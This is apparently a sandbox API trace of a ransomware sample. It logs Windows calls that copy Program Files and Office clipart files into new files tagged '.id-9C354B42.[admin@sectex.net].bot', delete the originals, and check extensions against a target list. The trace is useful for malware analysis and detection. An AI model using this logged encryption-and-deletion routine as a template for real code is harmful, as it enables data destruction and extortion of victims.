	[0052.079] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0052.079] GetLastError () returned 0x0
	[0052.079] ReadFile (in: hFile=0x204, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x9a5b, lpOverlapped=0x0) returned 1
	[0052.082] WriteFile (in: hFile=0x184, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x9a60, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x9a60, lpOverlapped=0x0) returned 1
	[0052.083] ReadFile (in: hFile=0x204, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0052.083] WriteFile (in: hFile=0x184, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0052.084] SetEndOfFile (hFile=0x184) returned 1
	[0052.084] CloseHandle (hObject=0x184) returned 1
	[0052.084] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0052.084] SetEndOfFile (hFile=0x204) returned 1
	[0052.085] CloseHandle (hObject=0x204) returned 1
	[0052.085] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0052.085] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl")) returned 1
	[0052.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77
	[0052.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77
	[0052.085] lstrlenW (lpString=".doc") returned 4
	[0052.085] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1
	[0052.085] lstrlenW (lpString=".docx") returned 5
	[0052.085] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1
	[0052.085] lstrlenW (lpString=".pdf") returned 4
	[0052.085] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1
	[0052.085] lstrlenW (lpString=".xls") returned 4
	[0052.085] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1
	[0052.085] lstrlenW (lpString=".xlsx") returned 5
	[0052.086] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1
	[0052.086] lstrlenW (lpString=".ppt") returned 4
	[0052.086] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1
	[0052.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77
	[0052.086] lstrlenW (lpString=".zip") returned 4
	[0052.086] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1
	[0052.086] lstrlenW (lpString=".rar") returned 4
	[0052.086] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1
	[0052.086] lstrlenW (lpString=".bz2") returned 4
	[0052.086] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1
	[0052.086] lstrlenW (lpString=".7z") returned 3
	[0052.086] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1
	[0052.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77
	[0052.086] lstrlenW (lpString=".dbf") returned 4
	[0052.086] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1
	[0052.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77
	[0052.086] lstrlenW (lpString=".1cd") returned 4
	[0052.086] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1
	[0052.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77
	[0052.086] lstrlenW (lpString=".jpg") returned 4
	[0052.086] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1
	[0052.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77
	[0052.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77
	[0052.086] lstrlenW (lpString=".doc") returned 4
	[0052.086] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1
	[0052.086] lstrlenW (lpString=".docx") returned 5
	[0052.086] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1
	[0052.086] lstrlenW (lpString=".pdf") returned 4
	[0052.086] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1
	[0052.086] lstrlenW (lpString=".xls") returned 4
	[0052.086] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1
	[0052.086] lstrlenW (lpString=".xlsx") returned 5
	[0052.086] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1
	[0052.086] lstrlenW (lpString=".ppt") returned 4
	[0052.086] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1
	[0052.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77
	[0052.087] lstrlenW (lpString=".zip") returned 4
	[0052.087] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1
	[0052.087] lstrlenW (lpString=".rar") returned 4
	[0052.087] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1
	[0052.087] lstrlenW (lpString=".bz2") returned 4
	[0052.087] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1
	[0052.087] lstrlenW (lpString=".7z") returned 3
	[0052.087] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1
	[0052.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77
	[0052.087] lstrlenW (lpString=".dbf") returned 4
	[0052.087] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1
	[0052.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77
	[0052.087] lstrlenW (lpString=".1cd") returned 4
	[0052.087] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1
	[0052.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77
	[0052.087] lstrlenW (lpString=".jpg") returned 4
	[0052.087] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1
	[0052.087] lstrcmpiW (lpString1=".xsl", lpString2=".bot") returned 1
	[0052.087] lstrlenW (lpString="Sybase.xsl") returned 10
	[0052.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204
	[0052.088] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=29790) returned 1
	[0052.088] CloseHandle (hObject=0x204) returned 1
	[0052.088] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl")) returned 0x20
	[0052.088] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0052.088] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204
	[0052.088] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0052.088] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0052.088] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0052.089] GetLastError () returned 0x0
	[0052.089] ReadFile (in: hFile=0x204, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x745e, lpOverlapped=0x0) returned 1
	[0052.091] WriteFile (in: hFile=0x184, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x7460, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x7460, lpOverlapped=0x0) returned 1
	[0052.093] ReadFile (in: hFile=0x204, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0052.093] WriteFile (in: hFile=0x184, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0052.093] SetEndOfFile (hFile=0x184) returned 1
	[0052.093] CloseHandle (hObject=0x184) returned 1
	[0052.093] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0052.093] SetEndOfFile (hFile=0x204) returned 1
	[0052.094] CloseHandle (hObject=0x204) returned 1
	[0052.094] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0052.094] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl")) returned 1
	[0052.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78
	[0052.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78
	[0052.094] lstrlenW (lpString=".doc") returned 4
	[0052.094] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1
	[0052.094] lstrlenW (lpString=".docx") returned 5
	[0052.094] lstrcmpiW (lpString1=".docx", lpString2="e.xsl") returned -1
	[0052.094] lstrlenW (lpString=".pdf") returned 4
	[0052.095] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1
	[0052.095] lstrlenW (lpString=".xls") returned 4
	[0052.095] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1
	[0052.095] lstrlenW (lpString=".xlsx") returned 5
	[0052.095] lstrcmpiW (lpString1=".xlsx", lpString2="e.xsl") returned -1
	[0052.095] lstrlenW (lpString=".ppt") returned 4
	[0052.095] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1
	[0052.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78
	[0052.095] lstrlenW (lpString=".zip") returned 4
	[0052.095] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1
	[0052.095] lstrlenW (lpString=".rar") returned 4
	[0052.095] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1
	[0052.095] lstrlenW (lpString=".bz2") returned 4
	[0052.095] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1
	[0052.095] lstrlenW (lpString=".7z") returned 3
	[0052.095] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1
	[0052.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78
	[0052.095] lstrlenW (lpString=".dbf") returned 4
	[0052.095] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1
	[0052.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78
	[0052.095] lstrlenW (lpString=".1cd") returned 4
	[0052.095] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1
	[0052.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78
	[0052.095] lstrlenW (lpString=".jpg") returned 4
	[0052.095] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1
	[0052.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78
	[0052.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78
	[0052.095] lstrlenW (lpString=".doc") returned 4
	[0052.095] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1
	[0052.095] lstrlenW (lpString=".docx") returned 5
	[0052.096] lstrcmpiW (lpString1=".docx", lpString2="e.xsl") returned -1
	[0052.096] lstrlenW (lpString=".pdf") returned 4
	[0052.096] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1
	[0052.096] lstrlenW (lpString=".xls") returned 4
	[0052.096] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1
	[0052.096] lstrlenW (lpString=".xlsx") returned 5
	[0052.096] lstrcmpiW (lpString1=".xlsx", lpString2="e.xsl") returned -1
	[0052.096] lstrlenW (lpString=".ppt") returned 4
	[0052.096] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1
	[0052.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78
	[0052.096] lstrlenW (lpString=".zip") returned 4
	[0052.096] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1
	[0052.096] lstrlenW (lpString=".rar") returned 4
	[0052.096] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1
	[0052.096] lstrlenW (lpString=".bz2") returned 4
	[0052.096] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1
	[0052.096] lstrlenW (lpString=".7z") returned 3
	[0052.096] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1
	[0052.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78
	[0052.096] lstrlenW (lpString=".dbf") returned 4
	[0052.096] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1
	[0052.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78
	[0052.096] lstrlenW (lpString=".1cd") returned 4
	[0052.096] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1
	[0052.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78
	[0052.096] lstrlenW (lpString=".jpg") returned 4
	[0052.096] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1
	[0052.096] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0052.096] lstrlenW (lpString="AG00004_.GIF") returned 12
	[0052.096] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00004_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0053.298] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=9024) returned 1
	[0053.298] CloseHandle (hObject=0x1d0) returned 1
	[0053.298] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00004_.gif")) returned 0x20
	[0053.298] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00004_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0053.298] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00004_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0053.298] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.298] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.298] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00004_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0053.299] GetLastError () returned 0x0
	[0053.299] ReadFile (in: hFile=0x1d0, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x2340, lpOverlapped=0x0) returned 1
	[0053.303] WriteFile (in: hFile=0x188, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x2350, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x2350, lpOverlapped=0x0) returned 1
	[0053.304] ReadFile (in: hFile=0x1d0, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0053.304] WriteFile (in: hFile=0x188, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0053.304] SetEndOfFile (hFile=0x188) returned 1
	[0053.304] CloseHandle (hObject=0x188) returned 1
	[0053.304] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.304] SetEndOfFile (hFile=0x1d0) returned 1
	[0053.305] CloseHandle (hObject=0x1d0) returned 1
	[0053.305] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0053.305] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00004_.gif")) returned 1
	[0053.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63
	[0053.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63
	[0053.305] lstrlenW (lpString=".doc") returned 4
	[0053.305] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0053.306] lstrlenW (lpString=".docx") returned 5
	[0053.306] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0053.306] lstrlenW (lpString=".pdf") returned 4
	[0053.306] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0053.306] lstrlenW (lpString=".xls") returned 4
	[0053.306] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0053.306] lstrlenW (lpString=".xlsx") returned 5
	[0053.306] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0053.306] lstrlenW (lpString=".ppt") returned 4
	[0053.306] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0053.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63
	[0053.306] lstrlenW (lpString=".zip") returned 4
	[0053.306] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0053.306] lstrlenW (lpString=".rar") returned 4
	[0053.306] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0053.306] lstrlenW (lpString=".bz2") returned 4
	[0053.306] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0053.306] lstrlenW (lpString=".7z") returned 3
	[0053.306] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0053.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63
	[0053.306] lstrlenW (lpString=".dbf") returned 4
	[0053.306] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0053.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63
	[0053.306] lstrlenW (lpString=".1cd") returned 4
	[0053.306] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0053.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63
	[0053.306] lstrlenW (lpString=".jpg") returned 4
	[0053.306] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0053.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63
	[0053.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63
	[0053.306] lstrlenW (lpString=".doc") returned 4
	[0053.306] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0053.306] lstrlenW (lpString=".docx") returned 5
	[0053.306] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0053.306] lstrlenW (lpString=".pdf") returned 4
	[0053.306] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0053.307] lstrlenW (lpString=".xls") returned 4
	[0053.307] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0053.307] lstrlenW (lpString=".xlsx") returned 5
	[0053.307] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0053.307] lstrlenW (lpString=".ppt") returned 4
	[0053.307] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0053.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63
	[0053.307] lstrlenW (lpString=".zip") returned 4
	[0053.307] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0053.307] lstrlenW (lpString=".rar") returned 4
	[0053.307] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0053.307] lstrlenW (lpString=".bz2") returned 4
	[0053.307] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0053.307] lstrlenW (lpString=".7z") returned 3
	[0053.307] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0053.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63
	[0053.307] lstrlenW (lpString=".dbf") returned 4
	[0053.307] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0053.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63
	[0053.307] lstrlenW (lpString=".1cd") returned 4
	[0053.307] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0053.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63
	[0053.307] lstrlenW (lpString=".jpg") returned 4
	[0053.307] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0053.307] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0053.307] lstrlenW (lpString="AG00038_.GIF") returned 12
	[0053.307] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0053.309] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=3251) returned 1
	[0053.309] CloseHandle (hObject=0x188) returned 1
	[0053.309] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif")) returned 0x20
	[0053.309] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0053.310] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0053.310] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.310] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
